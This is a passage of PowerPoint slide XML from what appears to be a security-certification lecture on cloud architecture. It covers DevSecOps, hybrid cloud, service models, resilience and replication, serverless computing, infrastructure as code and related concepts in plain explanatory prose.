              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> extends the boundary to security specialists and personnel, reflecting the principle that security is a primary consideration at every stage of software development and deployment. This is also known as shift left, meaning that security considerations need to be made during requirements and planning phases, not grafted on at the end. The principle of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> recognizes this and shows that security expertise must be embedded into any development project.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Ancillary to this is the recognition that security operations can be conceived of as software development projects. Security tools can be automated through code. Consequently, security operations need to take on developer expertise to improve detection and monitoring.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41117219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13D6-277F-DAB4-E819-628E3CAA6A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hybrid Cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2206D8-63A6-0185-A9D0-1E5EBBAD2B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A hybrid cloud most commonly describes a computing environment combining public and private cloud infrastructures, although any combination of cloud infrastructures constitutes a hybrid cloud. In a hybrid cloud, companies can store data in a private cloud but also leverage the resources of a public cloud when needed. This allows for greater flexibility and scalability, as well as cost savings. A hybrid cloud is commonly used because it enables companies to take advantage of the benefits of both private and public clouds. Private clouds can provide greater security and control over data, while public clouds offer more cost-effective scalability and access to a broader range of resources. A hybrid cloud also allows for a smoother transition to the cloud for companies that may need more time to migrate all of their data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36022852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A2CB7-B591-A978-B1C6-36420ECEFAE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Service Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE382D4A-70B9-784E-1E94-2EC967331820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As well as the ownership model (public, private, hybrid, or community), cloud service models are often differentiated on their level of complexity and the amount of pre-configuration provided. These models are referred to as something or anything as a service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). The three most common implementations are infrastructure, software, and platform.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Platform as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infrastructure as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-Party Vendors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1494554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ED0D-EDCE-94A9-BB97-31963B4879D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Responsibility Matrix</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 441">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4433C8E3-EBAB-735F-D41D-B2CDF218A86B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113760" y="2321895"/>
            <a:ext cx="9354008" cy="3731585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27289476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BC0C9-0450-94F1-9B63-FAF4BEC985D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Centralized and Decentralized Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2990EE-FA9C-3E0F-F312-C950EA40F831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decentralized architecture is becoming increasingly popular as it offers several benefits, such as improved fault tolerance, scalability, and unique security features. Some noteworthy examples of decentralized architecture include the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Blockchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Peer-to-peer (P2P)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Content delivery networks (CDNs)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Internet of Things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Distributed databases</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TOR (The Onion Router) </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9639128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FBD2D-A371-7748-F8E9-DAEA198FBAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Resilient Architecture Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C956B6E-50D0-CD82-E967-67137D90D9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451579" y="2015732"/>
            <a:ext cx="9603275" cy="4037749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the benefits of the cloud is the potential to provide services resilient to failures at different levels, such as components, servers, local networks, sites, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> centers, and wide area networks. The CSP uses a virtualization layer to ensure that computer, storage, and network provisions meet the availability criteria set out in its SLA. In terms of storage performance tiers, high availability (HA) refers to storage provisioned with a guarantee of 99.99% uptime or better. As with on-premises architecture, the CSP uses redundancy to make multiple disk controllers and storage devices available to a pool of storage resources. Data may be replicated between pools or groups, with each pool supported by separate hardware resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Replication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>High Availability Across Zones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local replication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Regional replication (also called zone-redundant storage)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Geo-redundant storage (GRS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138701430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F807F-7AC8-FEC9-28CD-A77E847CB04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Application Virtualization and Container Virtualization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 443">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7218E729-87FC-82DB-CC3A-ACABAD4406C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993900" y="2016124"/>
            <a:ext cx="7493000" cy="4168775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30236742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A677D-4572-2607-8AFD-679D99BA6230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A13EBC-EEEC-BF90-6062-5FFCD48E38A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028701" y="2015732"/>
            <a:ext cx="10248900" cy="4346968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Serverless Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Serverless computing is a cloud computing model in which the cloud provider manages the infrastructure and automatically allocates resources as needed, charging only for the actual usage of the application. In this approach, organizations do not need to manage servers and other infrastructure, allowing them to focus on developing and deploying applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Microservices</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Microservices is an architectural approach to building software applications as a collection of small and independent services focusing on a specific business capability. Each microservice is designed to be modular, with a well-defined interface and a single responsibility. This approach allows developers to build and deploy complex applications more efficiently by breaking them down into smaller, more manageable components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Transformational Changes</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Cloud computing offers many unique architectural services that differ from traditional on-premises services. Cloud-native services allow organizations to scale, innovate, and optimize their operations like never before. Important cloud architectural services include offerings like elastic compute and auto-scaling, which enable dynamic shifts in computing power in response to demand fluctuations.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Other services, such as serverless computing, significantly change application development practices by abstracting traditional server resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37057199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610CA-BF95-69DA-BB07-82221A0D3632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Automation Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5CE247-A65F-635D-87A8-8F3C4095EE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451579" y="2015732"/>
            <a:ext cx="9603275" cy="4385068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Infrastructure as Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infrastructure as Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is a software engineering practice that manages computing infrastructure using machine-readable definition files. These files contain code written in a specific format that can be read and executed by machines. These files manage and provision computing infrastructure. Machine- readable definition files are written in formats like YAML, JSON, and HCL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Configuration Language.) They contain information about the desired infrastructure state, including configuration settings, networking requirements, security policies, and other settings. By using machine-readable definition files, infrastructure can be deployed and managed automatically and consistently, reducing the risk of errors caused by manual intervention.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Responsiveness</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load balancing, edge computing, and auto-scaling are critical mechanisms to ensure responsiveness, improve performance, and effectively handle fluctuating workloads.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Load Balancing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Edge Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Auto-Scaling</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4609692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67A1F-B451-BB84-0C96-877D4753163D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Software Defined Networking</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 445">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C09396F5-CA5E-E362-84D2-157B319AC17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3416300" y="2016124"/>
            <a:ext cx="4906645" cy="4168775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106448041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73509-17C9-3F4D-12FD-7BC1F3AD90FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Architecture Features</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1ADF30-BDE2-F62C-6DF9-98A14A0938A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="2015732"/>
            <a:ext cx="10680700" cy="4473968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public cloud infrastructure provides a wide range of available features to ensure high uptime and minimal downtime for its customers. Data replication and redundancy are among the key features, as public cloud providers replicate data across multiple servers and datacenters to ensure data availability in the event of a server or datacenter failure. Auto-scaling is also a critical feature that allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources to scale automatically based on demand, ensuring that applications can handle high traffic volumes without downtime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
